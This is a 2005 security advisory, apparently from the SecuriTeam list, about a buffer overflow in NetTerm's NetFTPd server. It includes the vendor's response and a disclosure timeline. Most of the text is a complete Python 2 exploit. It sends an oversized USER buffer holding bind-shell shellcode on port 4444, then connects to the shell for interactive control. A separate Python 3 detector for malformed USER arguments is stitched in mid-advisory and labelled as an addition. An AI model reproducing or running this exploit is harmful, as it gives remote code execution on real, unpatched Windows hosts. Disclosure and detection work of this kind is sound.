[EXPL] NetTerm's NetFTPd Buffer Overflow (USER, Exploit)

Subject: [EXPL] NetTerm's NetFTPd Buffer Overflow (USER, Exploit)
Date: 27 Apr 2005 17:41:51 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  NetTerm's NetFTPd Buffer Overflow (USER, Exploit)
------------------------------------------------------------------------


SUMMARY

NetTerm <http://www.securenetterm.com/html/netterm.html> is a widely used 
Win32 telnet client: "NetTerm is a network terminal which can act as a 
telnet client, direct connect terminal and modem connected terminal to 
hosts that support the telnet protocol or dial-in modems."

A buffer overflow vulnerability exists in NetFTPd, an FTP server supplied 
with the NetTerm software. Exploiting this vulnerability allows remote 
attackers to execute malicious code on the vulnerable system.

DETAILS

Vulnerable Systems:
 * NetFTPd supplied with NetTerm version 5.1.1

Immune Systems:
 * NetTerm version 5.1.1.1 (NetFTPd has been removed from the release; see 
<http://www.securenetterm.com/html/what_s_new.html>).

NetTerm's NetFTPd has a buffer overflow in its authentication buffer. The 
'USER' command was tested, but other commands are probably vulnerable as 
well. Attached is a working exploit for Win2k, any SP.
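The input shape the advisory describes (an overlong, partly binary argument to USER) is easy to spot on the wire. The following detector is an added example and is not part of the SecuriTeam advisory or of shadown's exploit: it parses FTP control-channel lines and flags a USER argument that exceeds a length limit or carries non-printable bytes. MAX_USER_LEN, the helper names and the sample lines are assumptions constructed for this example.

```python
# Added example, not part of the SecuriTeam advisory or Sergio Alvarez's exploit.
# Flags FTP control-channel lines whose USER argument is oversized or carries
# non-printable bytes: the shape of input the advisory says overflows
# NetFTPd's authentication buffer. MAX_USER_LEN and SAMPLE_LINES are
# assumptions constructed for this example.
from typing import Dict, Iterable, List, Tuple

# Assumed policy threshold: legitimate usernames are short, printable ASCII.
MAX_USER_LEN = 64


def parse_command(line: bytes) -> Tuple[str, bytes]:
    """Split one FTP control line into (VERB, argument bytes).

    Only the trailing CRLF is stripped and only the first space is used as
    the separator, so a binary argument is preserved byte for byte.
    """
    body = line.rstrip(b"\r\n")
    verb, _, arg = body.partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg


def inspect_line(line: bytes, max_len: int = MAX_USER_LEN) -> Dict:
    """Return the parsed verb, the argument length and a list of findings."""
    verb, arg = parse_command(line)
    findings: List[str] = []
    if verb == "USER":
        if len(arg) > max_len:
            findings.append("USER argument is %d bytes, limit %d"
                            % (len(arg), max_len))
        # RFC 959 usernames are printable ASCII (0x20..0x7e); anything else
        # in this field is a strong sign of a crafted buffer.
        nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
        if nonprint:
            findings.append("USER argument carries %d non-printable bytes"
                            % nonprint)
    return {"verb": verb, "arg_len": len(arg), "findings": findings}


def scan_stream(lines: Iterable[bytes]) -> List[Dict]:
    """Inspect every line and keep only those that produced findings."""
    return [r for r in (inspect_line(l) for l in lines) if r["findings"]]


# Constructed sample control-channel lines (not captured traffic). The third
# line uses plain filler plus four binary bytes to mimic the rough size and
# shape of a kilobyte-scale USER buffer; it contains no shellcode.
SAMPLE_LINES = [
    b"USER alice\r\n",
    b"PASS hunter2\r\n",
    b"USER " + b"A" * 1000 + b"\xde\xad\xbe\xef" + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for hit in scan_stream(SAMPLE_LINES):
        print(hit["verb"], hit["arg_len"], "; ".join(hit["findings"]))
```

Both checks are cheap enough to run on a network sensor or an FTP-aware proxy placed in front of a legacy daemon, which matches the vendor's own advice to keep NetFTPd behind a firewall or remove it. The length limit should be derived from the real user population; the non-printable check needs no tuning, since a saved frame pointer or return address packed into the field is never printable ASCII.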

Exploit:
#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
 def __init__(self, host, port):
  self.host  = host
  self.port  = port
  self.bsize  = 512
  self.ebpaddr = 0xcacacaca
  self.retaddr = 0xdeadbeef
  self.sctype  = 'findskt'
  self.scport  = None

 def setebpaddr(self, addr):
  self.ebpaddr = addr

 def setretaddr(self, addr):
  self.retaddr = addr

 def setbsize(self, size):
  self.bsize = size

 def setsctype(self, type):
  self.sctype = type

 def setscport(self, port):
  self.scport = port

 def genbuffer(self):
  ##
  # Alpha port bind 4444, thanx metasploit
  ##
  sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
  sc += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
  sc += "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
  sc += "\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
  sc += "\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
  sc += "\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
  sc += "\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
  sc += "\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
  sc += "\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
  sc += "\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
  sc += "\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
  sc += "\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
  sc += "\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
  sc += "\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
  sc += "\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
  sc += "\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
  sc += "\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
  sc += "\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
  sc += "\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
  sc += "\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
  sc += "\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
  sc += "\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
  sc += "\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
  sc += "\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
  sc += "\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
  sc += "\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
  sc += "\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
  sc += "\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
  sc += "\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
  sc += "\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
  sc += "\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
  sc += "\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
  sc += "\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
  sc += "\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
  sc += "\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
  sc += "\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
  sc += "\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
  sc += "\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
  sc += "\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
  sc += "\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
  sc += "\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
  sc += "\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
  sc += "\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
  
  # shellcode
  #sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
  #sc  += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
  #sc  += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
  #sc  += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
  #sc  += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
  #sc  += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
  #sc  += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
  #sc  += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
  #sc  += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
  #sc  += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
  #sc  += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
  #sc  += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
  #sc  += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
  #sc  += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
  #sc  += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
  #sc  += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
  #sc  += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
  #sc  += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
  #sc  += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
  #sc  += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
  #sc  += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
  #sc  += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
  #sc  += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
  #sc  += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
  #sc  += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
  # other stuff
  nops = "\x41"*(self.bsize-len(sc)-50)
  ebp = struct.pack('<L', self.ebpaddr)
  # check if the value is an integer, otherwise it should be a string
  if self.retaddr.__class__.__name__ == 'int':
   ret = struct.pack('<L', self.retaddr)
  else:
   ret = self.retaddr
  # assemble buffer to send
  buffer = "USER "
  buffer += nops
  buffer += sc
  buffer += '\x42'*(50-4)
  buffer += ebp
  buffer += ret
  return buffer

 def exploit(self):
  # connect
  skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
   skt.connect((self.host, self.port))
  except socket.error, err:
   print "[-] Error: %s" % err[1]
   return None
  print "[+] Connected to %s:%d" % (self.host, self.port)
  # recv banner
  print "[+] Receiving Banner"
  res = skt.recv(100)
  print res
  # send payload
  time.sleep(1)
  print "[+] Sending payload"
  skt.send(self.genbuffer())
  time.sleep(2) # test on mcafee anti-b0f
  skt.close()
  # if successfull connect to the shell
  time.sleep(2)
  skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
   skt.connect((self.host, 4444))
  except socket.error, err:
   print "[-] Error: %s" % err[1]
   print "[-] Explotation failed\n[-] Daemon should be dead..."
   return None
  print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
  res = skt.recv(1024)
  if res:
   if res.count('Microsoft Windows'):
    print "[+] Welcome my lord, i'm here to serve you ;) ...\n"
    from telnetlib import Telnet
    telnet = Telnet()
    telnet.sock = skt
    try:
     telnet.interact()
    except:
     pass
    skt.close()
    print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
    return None
  skt.close()
  print '[-] Explotation failed\nDaemon should be dead...'

if __name__ == '__main__':
 if len(sys.argv) != 3:
  print "*************************************"
  print "* Coded by Sergio 'shadown' Alvarez *"
  print "*          shadown@gmail.com        *"
  print "*************************************"
  print "Usage: %s host port" % sys.argv[0]
  sys.exit(1)

 exp = warftpd(sys.argv[1], int(sys.argv[2]))
 exp.setsctype('findskt')
 exp.setscport(1234)
 exp.setbsize(1014)
 exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
 exp.setretaddr('\x4c\xfa\x12\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
 exp.exploit()

Disclosure Timeline:
21.04.05 - Discovery date
26.04.05 - Reported
26.04.05 - Vendor Response
26.04.05 - Public Advisory

Vendor Response:
"This is a known bug that has been reported to our clients.

Netftpd was a free addition to our NetTerm product, at the request of our 
clients. They were warned to never use netftpd as a general purpose ftp 
server, and to only use it behind a firewall. However, it does still 
present a potential problem, so we have removed it from the NetTerm 
distribution. Our www site at www.netterm.com and www.securenetterm.com 
has been updated with a version of NetTerm that does not contain the 
netftpd.exe program. We will also update the What's New page on both web 
sites for the new release in the next two days.

Thanks for bringing this to our attention.
Ken"


ADDITIONAL INFORMATION

The information has been provided by Sergio 'shadown' Alvarez 
<mailto:shadown@gmail.com>.


